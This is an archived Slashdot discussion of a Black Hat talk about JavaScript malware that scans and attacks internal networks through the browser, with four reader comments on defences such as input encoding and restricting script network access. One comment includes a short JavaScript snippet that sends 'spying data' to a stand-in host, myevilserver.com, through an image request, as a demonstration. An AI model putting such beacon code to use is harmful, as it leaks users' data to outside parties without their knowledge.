Slashdot Mirror

← Back to Stories (view on slashdot.org)

JavaScript Malware Open The Door to the Intranet

Posted by ryuzaki0 on from the anybody-home dept.

An anonymous reader writes "C|Net is reporting that JavaScript malware is opening the door for hackers to attack internal networks. During the Black Hat Briefings conference Jeremiah Grossman (CTO, WhiteHat Security) '...will be showing off how to get the internal IP address, how to scan internal networks, how to fingerprint and how to enter DSL routers ... As we're attacking the intranet using the browser, we're taking complete control over the browser.' According the the article, the presence of cross-site scripting vulnerabilities (XSS) dramatically increase the possible damage that can be caused. The issue also not which-browser-is-more-secure, as all major browsers are equally at risk. Grossman says 'The users really are at the mercy of the Web sites they visit. Users could turn off JavaScript, which really isn't a solution because so many Web sites rely on it.'"

4 of 169 comments (clear)

  1. Simple fix to an obvious problem by pieterh · · Score: 4, Insightful

    Giving JavaScript the power to do random network accesses may make AJAX possible, but code running in my browser has no business accessing my local intranet. For that matter, I'm uncomfortable with JavaScript applications 'phoning home' without my knowledge.

    So, the fix is to treat all attempts by JavaScript in a browser as 'hostile until proven otherwise', and to ask for user confirmation when such attempts happen. Put a firewall around the browser and treat any code running in it as dangerous by default.

    I predict 2 weeks before there's a FireFox update for this, and 2 years before MSIE fixes the problem.

    --
    My blog
    1. Re:Simple fix to an obvious problem by Goaway · · Score: 4, Insightful

      document.createElement("img");
      img.src="http://myevilserver.com/phonehome.cgi?evi lspyingdata="+encodeURIComponent(evilspyingdata);
      document.body.appendElement(img);

      Oops! I just phoned home without using XMLHttpRequest! How are you going to firewall that one out?

  2. Re:NoScript by Anonymous Coward · · Score: 5, Insightful

    The problem is not necessiarly the web browsers (and most don't even use Firefox let alone have even heard of that that extension). The problem is the websites that don't properly take steps to protect against XSS (e.g. HTMLencode user input).

    Most recently we saw this problem in Netscape's portal.

    http://blog.outer-court.com/archive/2006-07-26-n73 .html

    Developers need to start thinking not only about how to solve the particular business problem but also about how their code could be potentially abused by attackers and take active steps to mitigate that risk.

  3. You don't need it - you want it. by gnuman99 · · Score: 4, Insightful

    You don't need javascript to open a link to another page. You don't need javascript to open an image in a gallery. You don't need javascript to submit a username and password. You just don't need it.

    You don't need it - you want it. You want it to make the entire web experience better.

    From a security standpoint, everyone should be on lynx or similar browser. From the user standpoint, Javascript is essential (see maps.google.com, or gmail) for a good web experience. Images are fundamental. Web is not static HTML any more. We now live in the world of DHTML and security is just going to have to deal with it.

    Javascript is broken if it allows you to access other than non-remote resources (ie. from original website) and some settings available to it from the browser (windows size, etc..). That's what it is there for and other uses should be disabled. We already see it with the JS popup blockers. Similar security for network accesses should suffice.

    Similarly with Java, Flash and other things.